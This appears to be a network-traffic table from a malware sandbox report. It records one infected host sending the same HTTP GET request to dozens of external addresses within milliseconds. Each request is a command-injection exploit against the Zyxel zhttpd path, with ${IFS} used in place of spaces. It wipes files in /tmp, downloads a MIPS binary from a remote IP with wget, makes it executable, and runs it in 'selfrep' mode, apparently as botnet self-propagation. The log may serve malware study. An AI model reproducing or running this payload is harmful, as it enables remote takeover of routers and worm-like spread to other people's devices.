                                                        Jan 28, 2024 10:13:10.747390985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9044192.168.2.143310879.133.207.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.747421980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9045192.168.2.144916234.89.168.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.747478008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9046192.168.2.1443140179.151.90.52443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.747514009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9047192.168.2.1460394193.196.95.153443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.747572899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9048192.168.2.1447382164.225.182.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.747585058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9049192.168.2.1443636223.66.245.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.749754906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9050192.168.2.1437898130.231.94.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.749783993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9051192.168.2.1446280176.63.74.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.749820948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9052192.168.2.1446832133.193.139.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.749850988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9053192.168.2.144166488.51.110.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.749897003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9054192.168.2.1438326109.158.80.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.749917030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9055192.168.2.1454036124.165.96.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.749952078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9056192.168.2.144866859.193.195.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.749974966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9057192.168.2.1437176194.139.209.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.750014067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9058192.168.2.145669481.236.240.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.750049114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9059192.168.2.144641214.90.59.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.750103951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9060192.168.2.1450380153.96.199.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.750147104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9061192.168.2.1460076221.90.210.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.750180960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9062192.168.2.1447604103.109.119.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.750236034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9063192.168.2.143415473.195.81.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.750258923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9064192.168.2.1437926130.250.175.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.750299931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9065192.168.2.1440674171.75.14.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.750336885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9066192.168.2.1434542162.200.223.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.750374079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9067192.168.2.1435202191.57.74.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.750406027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9068192.168.2.145286442.138.17.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.750456095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9069192.168.2.1455446126.249.96.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.750479937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9070192.168.2.1442594165.60.219.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.750523090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9071192.168.2.146008882.50.199.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.750555038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9072192.168.2.1453924112.120.84.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.750601053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9073192.168.2.1438234151.140.50.138443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.750648975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9074192.168.2.1433048188.165.213.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.750685930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9075192.168.2.1436088201.75.182.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.750720978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9076192.168.2.145163463.86.177.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.750755072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9077192.168.2.1447320156.12.177.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.750794888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9078192.168.2.1443002178.108.123.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.750828028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9079192.168.2.1447794152.17.217.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.750871897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9080192.168.2.144960497.12.209.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.750910044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9081192.168.2.144064080.112.206.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.750935078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9082192.168.2.1436490186.135.230.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.750962019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9083192.168.2.1442016158.118.61.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.751024961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9084192.168.2.145760640.225.231.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.751061916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9085192.168.2.143308452.55.117.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.751115084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9086192.168.2.143324074.90.228.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.754920959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9087192.168.2.144410664.159.255.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.754959106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9088192.168.2.144938834.108.19.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.754998922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9089192.168.2.1434428119.180.65.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.755053997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9090192.168.2.1448232190.184.236.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.755074978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9091192.168.2.1441900138.155.246.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.755110979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9092192.168.2.145279698.157.88.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.755141973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9093192.168.2.145435849.163.47.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.755177021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9094192.168.2.1460702161.208.56.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.755203009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9095192.168.2.143588638.138.9.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.755222082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9096192.168.2.1445050154.58.217.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.755264044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9097192.168.2.1449540121.23.200.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.755310059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9098192.168.2.1436088138.119.169.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.755322933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9099192.168.2.144070832.156.141.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.755372047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9100192.168.2.145179471.152.238.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.755403042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9101192.168.2.1452612177.134.164.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.755444050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9102192.168.2.1441906130.199.39.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.755489111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9103192.168.2.1447616123.119.211.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.755513906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9104192.168.2.144644038.190.48.230443
                                                        TimestampBytes transferredDirectionData
